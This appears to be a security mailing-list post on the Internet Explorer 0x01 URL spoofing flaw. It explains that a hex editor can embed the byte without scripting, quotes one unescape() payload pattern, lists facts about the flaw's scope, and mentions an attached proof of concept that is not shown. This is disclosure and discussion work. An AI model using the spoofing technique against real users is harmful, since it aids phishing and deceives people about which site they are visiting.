__________________________________ Do you Yahoo!? Free Pop-Up Blocker - Get it now http://companion.yahoo.com/
Hello all,
There is a big misconception about the recent 0x01 URL Spoofing vuln. in several
peoples' mind that scripting is necessary for exploitation. However, this is not the
case. Instead of using the %01 sequence and unescaping it[1] like in all the exploits
posted till now, an hex editor can be used to directly embed the 0x01 byte in the URL.
I have attached a proof of concept exploit to demonstrate this issue.
[1] unescape('http://[EMAIL PROTECTED]/spoof.htm');
Although, the actual vulnerability is very simple, there has been a lot of confusion
with people misunderstanding its nature, scope and exploitation inspite of the
presence of a number of proof of concept exploits. Apart from this, many other ideas
and exploits have been presented by several people for both mitigation and better
exploitation. A few facts about this vulnerability are presented below. I hope this
clears some of the confusion.
1. This is only possible with the 0x01 byte.
2. SCRIPTING is NOT NECESSARY to exploit this vulnerability. A hex editor can be used
to embed the 0x01 byte. See the attached exploit.
3. This is not the same as the infamous "http://[EMAIL PROTECTED] URL Obfuscation"
technique that is mostly used by spammers.
4. If the %01 sequence is used, it is necessary to unescape() it.
5. IMO, this issue is not caused by an anomaly in IE's handling of non-printable
characters.
6. According to current information in the public domain, no other browser except IE
and dependant SW like Outlook is vulnerable to this issue. So this is a Microsoft
specific issue.
7. Other techniques like adding a null byte, using onmouseover or onclick, using %09,
etc are used to obfuscate the malicious link in the status bar when the mouse is
hovered over the link. These are not part of the 0x01 URL Spoofing vulnerability and
completely unrelated.
8. It is not necessary to tie the malicious URL to a button.
9. This vulnerability is really critical. Reasons have been discussed in great detail
on the lists. Think about the ease of exploitation, no scripting required, etc...
Regards,
--
S.G.Masood
Hyderabad,
India.
PoC.zip
Description: PoC.zip
